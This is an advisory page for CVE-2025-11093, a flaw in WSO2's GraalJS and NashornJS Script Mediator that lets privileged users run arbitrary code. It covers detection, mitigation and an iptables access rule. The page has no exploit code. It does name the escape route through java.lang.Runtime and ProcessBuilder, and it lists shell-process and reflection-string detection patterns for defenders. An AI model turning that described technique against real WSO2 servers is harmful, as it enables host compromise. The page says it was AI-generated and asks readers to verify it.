CVE-2025-11093 Overview
CVE-2025-11093 is an arbitrary code execution vulnerability affecting multiple WSO2 products. The flaw stems from insufficient restrictions in the GraalJS and NashornJS Script Mediator engines used by the integration runtime. Authenticated users holding elevated privileges can execute arbitrary code within the runtime environment.
In WSO2 Micro Integrator and WSO2 Enterprise Integrator, access to these scripting engines is restricted to administrators by default. In WSO2 API Manager, the access extends to both administrators and API creators. Trusted-but-privileged users can abuse this access to perform unauthorized actions or fully compromise the execution environment. The vulnerability is tracked as [CWE-94] (Improper Control of Generation of Code).
Critical Impact
Authenticated privileged users can execute arbitrary code within the WSO2 integration runtime, compromising confidentiality, integrity, and availability of the host process.
Affected Products
- WSO2 API Manager and WSO2 API Control Plane
- WSO2 Micro Integrator and WSO2 Enterprise Integrator
- WSO2 Traffic Manager and WSO2 Universal Gateway
Discovery Timeline
- 2025-11-05 - CVE-2025-11093 published to NVD
- 2026-01-09 - Last updated in NVD database
Technical Details for CVE-2025-11093
Vulnerability Analysis
The Script Mediator in WSO2 integration products allows developers to embed JavaScript logic inside mediation flows. The mediator delegates execution to either the GraalJS or NashornJS engine. Both engines run in a context that does not sufficiently restrict access to host Java classes and runtime APIs.
When a privileged user deploys or edits a mediation sequence containing a Script Mediator block, the embedded script executes inside the WSO2 Java Virtual Machine (JVM) with the privileges of the WSO2 service account. Because the engines lack a strict sandbox, attackers can reach java.lang.Runtime, java.lang.ProcessBuilder, and reflective APIs to execute operating system commands, read or modify files, and pivot inside the network.
The issue applies to authenticated sessions only, but the privilege barrier is low in API Manager deployments where API creators routinely author mediation logic. The result is a full breach of the integration runtime boundary from a legitimate user role.
Root Cause
The root cause is missing isolation between the script execution context and the host JVM. The Script Mediator does not enforce a deny-list or sandbox policy on Java interop calls, allowing scripts to instantiate arbitrary classes and invoke arbitrary methods.
Attack Vector
The attack vector is network-based. An attacker authenticates to the WSO2 management or publisher interface with an administrator or API creator role, then submits a mediation sequence containing JavaScript that invokes host-level Java APIs. Deployment of the sequence triggers code execution under the WSO2 process identity.
No verified public exploit code is available at the time of writing. Refer to the WSO2 Security Advisory WSO2-2025-4510 for vendor-confirmed technical details.
Detection Methods for CVE-2025-11093
Indicators of Compromise
- Unexpected child processes spawned by the WSO2 Carbon or Micro Integrator JVM, such as sh, bash, cmd.exe, or powershell.exe.
- New or modified Script Mediator entries in mediation sequences, registry resources, or Carbon Application (CApp) archives.
- Outbound network connections from the WSO2 host to unfamiliar destinations following a publisher or admin login event.
- Audit log entries showing API creators or administrators publishing mediation artifacts containing script mediators referencing java.lang.* classes.
Detection Strategies
- Inspect deployed synapse configurations for <script language="js"> or <script language="nashornJs"> blocks that import or reference Java classes.
- Correlate WSO2 publisher activity with process creation events on the host operating system to identify scripts that escape the JVM boundary.
- Alert on reflection-related strings (Runtime.getRuntime, ProcessBuilder, Class.forName) appearing in mediation source.
Monitoring Recommendations
- Forward WSO2 access, audit, and wso2carbon.log events to a centralized logging platform for retention and correlation.
- Monitor the WSO2 service account for shell invocations, file writes outside the product directory, and unexpected outbound connections.
- Review role membership in API Manager publisher and admin portals on a recurring basis and remove unused privileged accounts.
How to Mitigate CVE-2025-11093
Immediate Actions Required
- Apply the WUM updates and product fixes referenced in WSO2 Security Advisory WSO2-2025-4510 for all affected deployments.
- Audit all administrator and API creator accounts and revoke access from users who do not require mediation authoring capabilities.
- Review existing mediation sequences and Carbon Applications for unauthorized Script Mediator additions.
Patch Information
WSO2 has published remediation guidance in security advisory WSO2-2025-4510 covering API Manager, API Control Plane, Micro Integrator, Enterprise Integrator, Traffic Manager, and Universal Gateway. Consult the advisory for product-specific WUM levels and update instructions.
Workarounds
- Disable the Script Mediator entirely if mediation flows do not require JavaScript by removing or commenting the mediator class registration in the synapse handlers configuration.
- Restrict the Internal/creator and administrator roles in API Manager so only a small, audited set of identities can publish mediation logic.
- Place the WSO2 management interfaces behind a network policy that only allows access from administrative jump hosts.
# Example: restrict access to the WSO2 management console with iptables
iptables -A INPUT -p tcp --dport 9443 -s 10.0.10.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 9443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
